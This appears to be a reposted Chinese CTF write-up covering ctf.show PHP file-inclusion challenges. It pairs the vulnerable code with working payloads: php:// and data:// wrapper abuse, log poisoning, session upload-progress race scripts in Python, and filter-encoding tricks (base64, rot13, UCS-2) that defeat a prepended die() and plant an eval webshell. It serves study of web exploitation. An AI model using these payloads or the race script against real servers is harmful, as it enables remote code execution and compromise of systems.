目錄???????
??????????????WEB78
WEB79
WEB80
WEB81
WEB82-session檔案包含
WEB83
WEB84
WEB85
WEB86
WEB87
WEB88
WEB116
WEB117
???????WEB78
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
知識點:php偽協議
php://filter可以獲取指定檔案原始碼,當它與包含函式結合時,php://filter流會被當作php檔案執行,所以我們一般對其進行編碼,讓其不執行,從而導致 任意檔案讀取,
1、php://input
php://input可以訪問請求的原始資料的只讀流,將post請求的資料當作php代碼執行,
與include連用、當傳入的引數作為檔案名打開時,可以將引數設為php://input,同時post想設定的檔案內容,php執行時會將post內容當作檔案內容,從而導致任意代碼執行,
phpinput不支持post提交,需要用raw方式
hackbar不支持raw方式
請求的引數格式是原生(raw)的內容

方法1:
直接構造:?file=flag.php ,沒有得到想要的結果,可能是被決議了
利用偽協議讀取檔案
payload:?file=php://filter/convert.base64-encode/resource=flag.php
然后base64解碼即可
方法2:
bp抓包,給file傳參?file=php://input然后在post輸出想要執行的代碼



WEB79
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
知識點:str_replace
分析:相對于上一題,$file中的php轉換了???即過濾了php,所以php協議不能用了
方法1:大小寫繞過(str_replace區分大小寫、str_ireplace不區分)

方法2:
data://協議
php5.2.0起,資料流封裝器開始有效,主要用于資料流的讀取,如果傳入的資料是PHP代碼,就會執行代碼
payload:?file=data://text/plain,<?= system('tac flag.???');?>
逗號后面是要執行的php代碼
或者
payload:?file=data://text/plain;base64,PD89IHN5c3RlbSgndGFjIGZsYWcuPz8/Jyk7Pz4=
逗號后面是要執行的php代碼的base64加密形式
注:data://可以用data:代替
WEB80
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
知識點:日志檔案包含,偽造UA寫入php代碼
日志檔案包含
日志檔案記錄了服務器收到的每一次請求的
IP、訪問時間、URL、User-Agent,這4項中的前兩項的值都是我們無法控制的,我們只能在自己可以控制的欄位上做手腳,其中URL欄位由于URL編碼的存在,空格等一些符號會自動進行url編碼,存到日志當中時,不是一個正確的php陳述句,無法成功執行,而User-Agent則不會被進行任何二次處理,我們發什么內容,服務器就將其原封不動的寫入日志,
訪問日志的位置和檔案名在不同的系統上會有所差異
apache一般是/var/log/apache/access.log
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log
分析:php和data都被過濾了
方法1:繼續使用php大小寫繞過


方法2:日志檔案包含
nginx和apache的日志檔案包含也是一個考點
這個Linux的nginx日志檔案路徑是/var/log/nginx/access.log,要在用檔案包含漏洞讀取日志檔案的同時,修改ua頭為我們想要執行的命令(burp中go要點兩次才能執行命令,第一次將代碼寫入日志,第二次執行代碼
且操作一定不能出問題,如果報錯就要銷毀容器從頭再來
因為php語法錯誤后不再解釋執行后面代碼,語法錯誤后,后面不管語法對不對都不執行了,我們包含了日志檔案,如果日志檔案中我們插入了錯誤的php代碼,那么我們再次執行對的代碼時會先執行那個錯誤的php代碼,因為報錯,所以后面正確的就不會執行了,
先寫入日志

然后在包含日志、執行代碼,

方法3:遠程檔案包含
遠程檔案包含可以包含其他主機上的檔案,并當成php代碼執行,
要實作遠程檔案包含的話,php配置的allow_url_include = on必須為on
payload:?file=http://***.***.***.***/1.txt
1.txt里面寫入代碼,
WEB81
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
分析:因為過濾了冒號,所以遠程檔案包含和大小寫繞過不行了,只能用日志包含
WEB82-session檔案包含
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
知識點:
session上傳進度
利用PHP_SESSION_UPLOAD_PROGRESS進行檔案包含
利用session.upload_progress進行檔案包含和反序列化滲透
分析:過濾了點,所以日志包含也不行了,
PHP里面唯一我們能控制的沒有后綴的檔案就是session檔案
利用PHP_SESSION_UPLOAD_PROGRESS寫入session檔案加條件競爭達到檔案包含的目的
1. session.upload_progress.enabled = on
2. session.upload_progress.cleanup = on(默認開啟)
3. session.upload_progress.prefix = "upload_progress_"(默認)
4. session.upload_progress.name = "$PHP_SESSION_UPLOAD_PROGRESS"(默認)
enabled=on表示upload_progress功能開始,也意味著當瀏覽器向服務器上傳一個檔案時,php將會把此次檔案上傳的詳細資訊(如上傳時間、上傳進度等)存盤在session當中 ;
cleanup=on表示當檔案上傳結束后,php將會立即清空對應session檔案中的內容
name當它出現在表單中,php將會報告上傳進度,最大的好處是,它的值可控也就是PHP_SESSION_UPLOAD_PROGRESS的值可控;
prefix+name將表示為session中的鍵名,
方法:


大體思路為:
1、post一個與ini中設定的session.upload_progress.name的同名變數(默認的name為“PHP_SESSION_UPLOAD_PROGRESS”),那么就會回傳上傳檔案的實時進度并寫入session檔案中,session檔案的內容為:(它會在$_SESSION中添加一組資料, 索引是session.upload_progress.prefix與 session.upload_progress.name連接在一起的值)
2、如果我們post傳遞PHP_SESSION_UPLOAD_PROGRESS的值為一句話木馬
比如為:<?php system('ls');?>
3、同時,我們在cookie里面設定名字:PHPSESSID,值:flag,(目的是設定session檔案,因為這樣我們才能知道實時進度(一句話木馬)上傳到哪里了);那么在/tem/sess_flag這個檔案的內容就為upload_progress_<?php system('ls')?>,然后在include(/tem/sess_flag)就會執行后面的php代碼從而成功執行rce,
4、雖然檔案上傳結束后,php會清空session檔案中的內容,但是如果我們邊上傳邊去訪問/tem/sess_aaa進行條件競爭,那么就有可能在洗掉session檔案前訪問到這個檔案,
我們能夠創建session檔案的原因:session里有一個默認選項,session.use_strict_mode默認值為off,也就是說此時用戶是可以自己定義Session ID的,比如,我們在Cookie里設定PHPSESSID=aaa,PHP將會在服務器上創建一個檔案:/tmp/sess_aaa”,即使此時用戶沒有初始化Session,PHP也會自動初始化Session,并產生一個鍵值,這個鍵值ini.get("session.upload_progress.prefix")+由我們構造的session.upload_progress.name值組成,最后被寫入sess_aaa檔案里,

注:在Linux系統中,session檔案一般的默認存盤位置為
/var/lib/php/session
/var/lib/php
/var/lib/php/sessions
/tmp/
/tmp/sessions/
本題型一律采用/tmp形式

但是session.upload_progress.cleanup默認是開啟的,一旦讀取了所有POST資料,它就會清除進度資訊,把我們session檔案里的內容全部洗掉,所以這里我們需要利用條件競爭來讀取session檔案,
bp抓包方法-手動爆破:
1、先構造一個上傳檔案的頁面,對環境上傳一個任意的檔案,內容也任意,然后抓包,
腳本如下:
<!DOCTYPE html>
<html>
<body>
<form action="http://26bfc8ed-f28a-46ef-94a6-bbff5bb92e6b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
2、 修改上傳檔案包
注意兩點:
(1)設定Cookie:PHPSEESSID=flag、這樣我們的session就為/tmp/sess_flag
(2)設定同名變數PHP_SESSION_UPLOAD_PROGRESS,設定值為我們想要存入session檔案的代碼,(把第一步中value=123的改掉即可,這里對123加上§§是為了進行爆破payload用)
3、包含session檔案,抓包

這里§a§是為了爆破payload用
4、進行爆破
將兩個爆破專案的payload設定如下:

payload數量可以設定10000次,也可以使用下面的無數次,
設定執行緒數(這里用了30)
然后一起爆破(先對上傳檔案包點擊attack,在對/tmp/sess_flag檔案包含包點擊attack,也可以不管順序,因為爆破次數有很多)
爆破結果:
最后將ls改成tac fl0g.php就行
腳本方法:
腳本:
import requests
import io
import threading
url='http://08d4a04e-19b3-4049-8a81-e9c6226eee2f.challenge.ctf.show:8080/'
#設定PHPSESSID的值
sessionid='ctfshow'
data={"1":"file_put_contents('/var/www/html/tao.php','<?php eval($_POST[2]);?>');"}
#為了進行條件競爭,需要一邊寫一邊讀
#進行上傳檔案時需要post傳遞名為PHP_SESSION_UPLOAD_PROGRESS值為一句話木馬
def write(session):
fileBytes = io.BytesIO(b'a'*1024*50) #生產一個50k的檔案
while True:
response=session.post(url,
data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'},
cookies={'PHPSESSID':sessionid},
files={'file':('ctfshow.jpg',fileBytes)} #設定檔案名字和內容
)
#讀取session檔案,這里檔案為/tmp/sess_ctfshow
def read(session):
while True:
response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data)
response2=session.get(url+'tao.php');
if response2.status_code==200:
print('++++++++++++++++++++')
else:
print(response2.status_code)
if __name__=='__main__':
#開啟多執行緒進行競爭
evnet=threading.Event()
with requests.session() as session:
for i in range(20):
threading.Thread(target=write,args=(session,)).start()
for i in range(20):
threading.Thread(target=read,args=(session,)).start()
evnet.set()
出現+號后然后訪問url/tao.php,post傳參2=system('tac fl0g.php');
其他問題:
include包含檔案(不管是不是php檔案),如果這個檔案里面有php代碼是可以執行的,





WEB83
題目:
Warning: session_destroy(): Trying to destroy uninitialized session
in /var/www/html/index.php on line 14
<?php
session_unset();
session_destroy();
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
分析:多了兩個函式
session_unset():
釋放當前在記憶體中已經創建的所有$_SESSION變數,但不洗掉session檔案以及不釋放對應的session_idsession_destroy():
洗掉當前用戶對應的session檔案以及釋放sessionid,記憶體中的$_SESSION變數內容依然保留, 也不會重置會話 cookie
表面上,按道理來說:這兩個函式都已經將有關session的東西都洗掉了,我們是無法進行session檔案包含的,但是:我們的腳本或者bp仍然能夠進行包含,原因在于多執行緒競爭的含義???????
知識點:
什么是多執行緒競爭
執行緒是非獨立的,同一個行程里執行緒是資料共享的,當當各個執行緒訪問資料資源時會出現競爭狀態即:
資料幾乎同步會被多個執行緒占用,造成資料混亂,即所謂的執行緒不安全 ,
這樣,因為在執行session_unset()與執行session_destroy()的時候有間隔,他們與include($file)直接也會有間隔,我們其中的一個執行緒在洗掉session檔案,而另一個執行緒剛剛又創建了一個session檔案,然后前面的執行緒又開始包含,那么還是能夠正常包含,
怎么解決多執行緒競爭問題?---鎖
鎖的好處: 確保了某段關鍵代碼(共享資料資源)只能由一個執行緒從頭到尾完整地執行能解決多執行緒資 源競爭下的原子操作問題,
鎖的壞處: 阻止了多執行緒并發執行,包含鎖的某段代碼實際上只能以單執行緒模式執行,效率就大大地下 降了
鎖的致命問題: 死鎖
方法:
還是web82的方法、同樣的道理:多執行緒競爭理解
WEB84
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*");
include($file);
}else{
highlight_file(__FILE__);
}
system 這句話會洗掉/tem/下面的所有檔案,且不能恢復
-f:強制洗掉檔案或目錄;
-r或-R:遞回處理,將指定目錄下的所有檔案與子目錄一并處理;
還是web82的方法、同樣的道理:多執行緒競爭理解
WEB85
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){
die("error");
}
include($file);
}
}else{
highlight_file(__FILE__);
}
知識點:
file_exists — 檢查檔案或目錄是否存在,如果由指定的檔案或目錄存在則回傳
true,否則回傳false,file_get_contents — 將整個檔案讀入一個字串,函式回傳讀取到的資料, 或者在失敗時回傳
false,strpos — 查找字串首次出現的位置,回傳 needle 存在于
haystack字串起始的位置(獨立于 offset),同時注意字串位置是從0開始,而不是從1開始的,如果沒找到 needle,將回傳false,
方法:
還是web82的方法、同樣的道理:多執行緒競爭理解
原因是:
session.upload_progress.cleanup = on(默認開啟)
cleanup=on表示當檔案上傳結束后,php將會立即清空對應session檔案中的內容
我們在設定session檔案后,被洗掉了,但是一個執行緒剛好進行if判斷,檔案存在,且檔案內容為空,那么就會準備執行include,同時另一個執行緒剛好設定了完整的session檔案,那么就會被包含進去,
WEB86
題目:
<?php
define('還要秀?', dirname(__FILE__));
set_include_path(還要秀?);
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
知識點:
define — 定義一個常量
dirname:回傳 path 的父目錄, 如果在
path中沒有斜線,則回傳一個點('.'),表示當前目錄,否則回傳的是把path中結尾的/component(最后一個斜線以及后面部分)去掉之后的字串,set_include_path — 設定include函式中 include_path 配置選項,成功時回傳舊的 include_path或者在失敗時回傳
false,include
被包含檔案先按引數給出的路徑尋找,如果沒有給出目錄(只有檔案名)時則按照 include_path指定的目錄尋找,如果在 include_path下沒找到該檔案則
include最后才在呼叫腳本檔案所在的目錄和當前作業目錄下尋找,如果最后仍未找到檔案則include結構會發出一條警告;這一點和require 不同,后者會發出一個致命錯誤,如果定義了路徑——不管是絕對路徑(在 Windows 下以盤符或者
\開頭,在 Unix/Linux 下以/開頭)還是當前目錄的相對路徑(以.或者..開頭)——include_path都會被完全忽略,例如一個檔案以../開頭,則決議器會在當前目錄的父目錄下尋找該檔案,
方法:
還是web82的方法、同樣的道理:多執行緒競爭理解
因為設定了目錄/tmp/sess_flag,所以set_include_path對我們的腳本沒有用,
WEB87
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬別秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
知識點:
談一談php://filter的妙用???????
file_put_content和死亡·雜糅代碼之緣
file_put_contents — 將一個字串寫入檔案
通常一個字符是一個位元組,但是根據編碼不同,一個字符也可能等于兩個或者三個字符,
ASCII碼:
一個英文字母(不分大小寫)占一個位元組的空間,一個中文漢字占兩個位元組的空間,UTF-8編碼:
一個英文字符等于一個位元組,一個中文(含繁體)等于三個位元組,Unicode編碼:
一個英文等于兩個位元組,一個中文(含繁體)等于兩個位元組,
符號:
英文標點占一個位元組,中文標點占兩個位元組,舉例:英文句號“.”占1個位元組的大小,中文句號“,”占2個位元組的大小,
base64編解碼
base64轉換后的字串的數量肯定是4的倍數, 不足4的末尾補‘=’
分析:
向檔案輸入內容的時候會在開頭寫入死亡函式,從而導致直接結束代碼的執行,我們要做的就是繞過這個死亡函式,
編碼時,轉換成Base64的最小單位就是3個位元組
解碼時,4個位元組為一組;PHP在解碼base64時,遇到不在其中的字符時,將會忽略這些字符,僅將合法字符組成一個新的字串進行解碼(Base64的字符選用了"A-Z、a-z、0-9、+、/" 64個可列印字符)所以,通過base64解碼過濾之后就只有 phpdie6 個字符我們就要添加2個字符讓phpdie和我們增加的兩個字符組合起來進行解碼,即可抹掉死亡函式,
其次:因為filename那里需要urldecode,而get傳參的時候會進行一次urldecode,所以我們的filename需要兩次urlencode,?file=php://filter/write=convert.base64-decode/resource=1.php這里需要進行url全編碼,不然php會被過濾掉,
將<?php eval($_POST[1]);?>進行base64編碼為:PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
注意如果直接傳入content,這里的+會被當做空格處理,所以在base64解碼的時候就會忽略空格,自動在后面加上一個=:即PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8=
解碼后:<?php eval($_POST[1]);? 這樣傳進去就會報錯
解決方法:將+進行urlencode
方法1:
payload:?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30
//即?file=php://filter/write=convert.base64-decode/resource=1.php
//對寫的內容進行base64編碼,
post:content=aaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B
//<?php eval($_POST[1]);?>
//這里加上兩個a是為兩和phpdie組成8個字符進行解碼,
最后訪問1.php、post輸入system('tac fl0g.php');即可

ps:strip_tags在php7.3.0以上的環境下會發生段錯誤,從而導致無法寫入,但是在php5的環境下則不受此影響
方法2:
利用rot13編碼
條件:在PHP不開啟short_open_tag(短標簽)時
payload:
?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30
//?file=php://filter/write=string.rot13/resource=3.php
//對寫的內容進行rot13編碼,
content=<?cuc riny($_CBFG[1]);?>
//<?php eval($_POST[1]);?>
//rot13兩次解碼后會變成原來的樣子,所以我們將傳入的content進行一次rot13編碼,然后在寫入3.php的時候在進行rot13編碼,那么寫入檔案的時候就會寫入<?php eval($_POST[1]);?>,
//而<?php die('大佬別秀了');?>只會進行一次rot13編碼,寫入檔案的時候就不是一個正常的php代碼格式,

WEB88
題目:
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
分析:
這里沒有過濾data且沒有過濾:,所以我們可以使用data協議
方法:
payload:
?file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbJ21vbmljYSddKTs/Pnh4
post:monica=system('tac f*');
//?file=data://text/plain;base64,<?php eval($_POST['monica']);?>xx
這里在后面添加兩個xx是為了不讓后面的php代碼base64加密之后出現=,有幾個=就加幾個字符(其實也可以直接將=洗掉,因為base64在解碼的時候會自動洗掉=),如果加密后出現出現+就只能換一個php代碼,
WEB116
一道misc加簡單的檔案包含
方法:下載視頻,用binwalk打開(或者010editor),foremost分離,發現圖片,提取原始碼,傳參?file=flag.php,再下載視頻用winhex打開即可(或者傳參后用bp抓包)
WEB117
題目:
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
分析:沒有過濾php,那么我們就可以通過php://filter/write來寫入檔案,然后通過編碼繞過死亡函式,因為這里過濾了base64和rot13,string,所以得用其他的編碼,
知識點:
用ucs-2編碼
更多編碼方式
convert.iconv.
這個過濾器需要 php 支持
iconv,而 iconv 是默認編譯的,使用convert.iconv.*過濾器等同于用iconv()函式處理所有的流資料, 然而 我們可以留意到iconv — 字串按要求的字符編碼來轉換;;其用法:iconv ( string $in_charset , string $out_charset , string $str ) : string將字串str從in_charset轉換編碼到out_charset, 就其功能而論,有點類似于base_convert的功效一樣,只不過二者還是有作用的區別,只是都是涉及編碼轉換的問題而已;(可以類比);由此記得國賽的一道love_math的題目,有了base_convert之后就可以盡情的轉換從而getshell;那么我們就可以借用此過濾器,從而進行編碼的轉換,寫入我們需要的代碼,然后轉換掉死亡代碼,其實本質上來說也是利用了編碼的轉換;

方法:
payload:
get: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=monica.php
post:contents=?<hp pvela$(P_SO[T]1;)>?
//ucs大小寫都行
然后訪問monica.php
post:1=system('tac f*');
//原理和rot13一樣,兩次轉換后變成了原來的樣子
echo iconv("UCS-2LE","UCS-2BE",'<?php die();?>?<hp pvela$(P_SO[T]1;)>?');
輸出如下,使得die失效,并且我們的一句話木馬可以使用
?<hp pid(e;)>?<?php eval($_POST[1]);?>

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299609.html
標籤:其他


